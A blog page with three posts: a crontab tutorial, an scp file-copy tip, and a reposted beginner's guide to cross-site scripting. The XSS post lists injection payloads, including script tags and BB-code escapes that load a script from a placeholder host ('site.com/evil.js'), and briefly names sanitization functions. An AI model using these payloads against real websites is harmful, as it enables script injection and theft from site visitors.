Showing posts with label tutorial. Show all posts
Showing posts with label tutorial. Show all posts

Tuesday 27 November 2012

Basic Guide To Crontab

Well it has been a busy week and now I am back with this basic guide to running cron jobs in linux.

Cron is a time-based job scheduling program which comes shipped with most linux distributions and enables users to execute commands or set of scripts automatically at the specified time. Cron is particularly important for system administration and maintenance though it can be used for any general purpose such as scheduling your porn downloads. My post is based on the Vixie Cron, a popular implementation of Cron by Paul Vixie which is by default the cron program in Ubuntu. Other implementations of the cron are anacron, fcron, and dcron.

The cron daemon runs automatically during the startup and consults the crontabs (shorthand for cron tables) for jobs to executed. Crontabs are nothing but files containing the commands to be run at the specified time, however there is a particular (& simple to remember) syntax for cronjobs to be run. You could directly edit these cron tables files but that's not the recommended way. You should always use the crontab editor to add/update jobs to the crontabs.

Cron searches its spool area (located at /var/spool/cron/crontabs) for crontab files which are named after the user accounts from /etc/passwd. As a matter of precaution, you should not directly manipulate the files in there. Additionally, cron reads the /etc/crontab file and all the files in /etc/cron.d. Also, there are other folders: /etc/cron.daily, /etc/cron.hourly, /etc/cron.monthly, and /etc/cron.weekly. And, the name of folders are obvious so if you put the scripts in one of these folders, your script will run either daily or hourly or monthly or weekly.

Since you got several files associated with cron, you have bunch of options on running the cron jobs in your system. First lets start with the crontab tool which is used to install, deinstall or list the tables used to drive the cron daemon. If the /etc/cron.allow file exists, then you must be listed (one user per line) therein in order to be allowed to use this command. If the /etc/cron.allow file does not exist but the /etc/cron.deny file does exist, then you must not be listed in the /etc/cron.deny file in order to use this command.

The crontab command provides following options:
        -e edit user's crontab
 -l list user's crontab
 -r delete user's crontab
 -i prompt before deleting user's crontab


crontab can be configured to use any of the editors.

To list the user's crontab, use the following command:

$ crontab -l


To delete existing cron table, type:

$ crontab -ir


To install new cron table, type:

$ crontab -e


If you are wishing to add commands that require root privilege for execution, make sure you prepend sudo in the above command to add such commands to crontabs. The cron table expects each line of cron job in the following format:

m h dom mon dow command
i.e.
minute hour day_of_month month day_of_week command_to_run


These columns take the values in the range below:

  Minute (0 - 59)
  Hour (0 - 23)
  Day of month (1 - 31)
  Month (1 - 12)
  Day of the week (0 - 6, 0 representing sunday, 6 saturday)



Apart from these values, the cron entries accept other special characters. In each of these five columns:

  • An asterisk (*) stands for "every".
  • Slashes (/) are used to describe increments of ranges eg. */15 in minutes column would execute the specified command regularly and repeatedly after 15 minute.
  • Commas (,) are used to separate items of a list. eg. using 1,2,3 in the 5th field (day of week) would mean Mondays, Tuesday, and Wednesday.
  • Hyphens (-) are used to define ranges. For example, 2-5 in the 5th field would indicate Tuesday to Friday.


Now we know the format of how should each line of cron entry should look like, lets see some examples.

Run backup at 5 a.m every Monday

0 5 * * 1 /bin/mybackup


Run backup at 12:01 a.m monday-thursday

1 0 * * 1-4 /bin/mybackup


Run backup at 12:01 a.m on monday and thursday

1 0 * * 1,4 /bin/mybackup


Run backup every minute

* * * * * /bin/mybackup


Run backup every 15 minutes repeatedly

*/15 * * * * /bin/mybackup


The information below is taken directly from man 5 crontab and can serve as a good reference for special strings in place of the 5 columns:
              @reboot        Run once, at startup.
              @yearly        Run once a year, "0 0 1 1 *".
              @annually      (same as @yearly)
              @monthly       Run once a month, "0 0 1 * *".
              @weekly        Run once a week, "0 0 * * 0".
              @daily         Run once a day, "0 0 * * *".
              @midnight      (same as @daily)
              @hourly        Run once an hour, "0 * * * *".


Now that you are feeling better with cronjobs, we will see how we can add cronjobs in the /etc/crontab file. The different thing about this crontab file is that there is an extra column for user field so that the particular cron entry is executed as the specified user.

The format for cron entry is similar to what we've seen already, with an extra column for user.

m h dom mon dow user command


You can use any text editor such as nano or vi to edit the /etc/crontab file.

Finally, once you update crons, make sure to restart the cron daemon to ensure your new cron entries get read by the daemon.

$ sudo service cron restart


I hope this primer for crontab helps you in your job scheduling job :D


Read more...

Sunday 18 December 2011

Copying Files From Remote Server Using SCP In Linux

Hi everybody, sometimes you need to copy files from remote server and only thing you have access to might be SSh. If you can access remote server via SSh, then you can copy files from the remote server using scp(secure file copy). This short tip will help you copy files from remote server using scp.

Scp is remote secure file copy program that makes use of SSh for the data transfer and uses the SSh authentication. The general syntax is as below:

scp -P ssh_port user@server:remote_file_path local_file_path

Following was the command I used to copy a file from remote server to my computer. It will then ask for the password for the corresponding user before you can copy the file.

scp -P 222 netadmin@192.168.0.1:/home/kubh/Desktop/torrent_trackers_list.txt /samar/torrent_trackers.txt

Also, there are GUIs for this purpose as well such as WinSCP for windows and Krusader file manager and gftp for linux distros. GUI would make things easier but still I am used to with command lines and I hope you are as well.

I hope this helps. :)

Edit(Dec 19): Paths with whitespaces must be escaped with \ character. An example of this is as below:

samar@Techgaun:~$ scp -P 222 "netadmin@192.168.0.1:/home/netadmin/Downloads/Hostel\ Part\ III\ \(2011\)\ DVDRip\ 400MB/HOST.DVD_urgrove.com.mkv.002" /samar/Moviez/Hostel1.mkv.002

Read more...

Tuesday 13 December 2011

Art of hacking 3 - spyd3rm4n's guide to hacking

This series of articles can be very useful for many beginners out there but after the thedefaced and darkmindz went down, I haven't really seen these articles anywhere else. So I thought to share this article over here. Its NOT written by me and I would like to provide the full credit to the original author as well.

Previous articles:
Part 1

Part 2


spyd3rm4n's guide to XSS Injection

Part 3

[0x01] XSS_Definition
[0x02] Pen-Testing
[0x03] Common Fields
[0x04] Escaping_BB_Code
[0x05] Image_XSS


Sub XSS_Defnition{

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed by other users. Examples of such code include HTML code and client-side scripts. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy. Recently, vulnerabilities of this kind have been exploited to craft powerful phishing attacks and browser exploits. Cross-site scripting was originally referred to as CSS, although this usage has been largely discontinued.

-Taken from Wikipedia Wikipedia if you want to read more.
}

Sub Pen-Testing{

Pen-Testing, short for Penetration Testing. Pen-testing with XSS can be very easy, or very hard. It depends on the person doing this. Some common queries when pen-testing a field can include but are not limited to:

<script>alert(1)</script>
<script language="javascript">alert(1)</script>
<script src="http://site.com/evil.js">
<img src="http://site.com/evil.js">


A great site to find some of the most useful queries it http://ha.ckers.org/xss.html

Now, once you've tested the fields, if the following page returned contains any sort of popup/javascript. You know it's vulnerable.

}

Sub Common_Fields{

Some of the most common fields that I have noticed are search fields. These will most likely return the following page showing the input.

Example: I search for "Orson Wells" and the page returned: 0 Results for query "Orson Wells" or something of that sort.

There are simple ways to get around this, since I am a php coder, my favorite way is the htmlentities(), you can also use strip_tags().

Some other search engines might not show what you searched for on the page itself, but in the field, the value is still there.

If this is the case, you can search for '"/></>[XSS]

this should escape the html field value, if it is not sanitized correctly and execute the [XSS] on the page.

Basically, any field that asks for user input that is either POST or GET and is in the source of the following page, can be cross-site scripted if not properly sanitized.

}

Sub Escaping_BB_Code{

This is one of my favorite ways to XSS a site. Some people decide to create their own BB code or use on that is poorly sanitized. This can be very easy to exploit.

Let's say there is an option to make my font red using hte [font color="red"] BB code.

Well, if I post a message with [font color="red"]hi[/font] and I look at the next page's source code, I see <font color="red">hi</font>,

I will re-post using

[font color="red"></font><script>alert(/hi/)</script>]hi[/font]

And if it is poorly sanitized, the page following it would contain an alert box saying /hi/.



There are so many different ways to escape BB code it is almost too easy. Some other sites have [IMG]. This one can be easy also.

[IMG]http://site.com/image"></><script src=http://site.com/evil.js>[/IMG]

would have

<img src="http://site.com/image"></><script src=http://site.com/evil.js>

}

Sub Image_XSS{

This is probably the best discovery to XSS since, whenever. With this, you can place javascript inside an image and have it execute in Internet Explorer.

Reffer to: http://milw0rm.com/video/watch.php?id=58

}


Read more...